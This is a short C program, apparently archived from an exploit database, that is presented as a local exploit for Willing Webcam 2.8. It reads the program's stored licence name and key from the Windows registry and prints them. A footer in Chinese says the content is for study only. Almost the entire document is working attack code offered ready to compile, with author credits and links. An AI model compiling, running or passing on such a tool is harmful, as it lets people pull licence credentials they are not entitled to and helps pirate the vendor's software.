/***************************************************************** Willing Webcam 2.8 licence info disclosure local exploit by Kozan Application: Willing Webcam 2.8 (and probably prior versions) Vendor: Willing Software - www.willingsoftware.com Vulnerable Description: Willing Webcam 2.8 discloses licence informations (username and key) to local users. Discovered & Coded by: Kozan Credits to ATmaCA Web: www.netmagister.com Web2: www.spyinstructors.com Mail: kozan@netmagister.com *****************************************************************/ #include <stdio.h> #include <windows.h> #define BUF 100 int main() { HKEY hKey; char Name[BUF], Key[BUF]; DWORD dwBUFLEN = BUF; LONG lRet; if( RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Willing Software\\Willing WebCam", 0, KEY_QUERY_VALUE, &hKey ) == ERROR_SUCCESS ) { lRet = RegQueryValueEx(hKey, "Name", NULL, NULL, (LPBYTE)Name, &dwBUFLEN); if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Name,"Not Found!"); lRet = RegQueryValueEx(hKey, "Key", NULL, NULL, (LPBYTE)Key, &dwBUFLEN); if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Key,"Not Found!"); RegCloseKey(hKey); printf("Willing Webcam 2.8 Local Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com \n"); printf("kozan@netmagister.com\n\n"); printf("Licence Name : %8s\n",Name); printf("Licence Key : %8s\n",Key); } else { printf("Willing Webcam 2.8 is not installed on your system!\n"); } return 0; } // sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论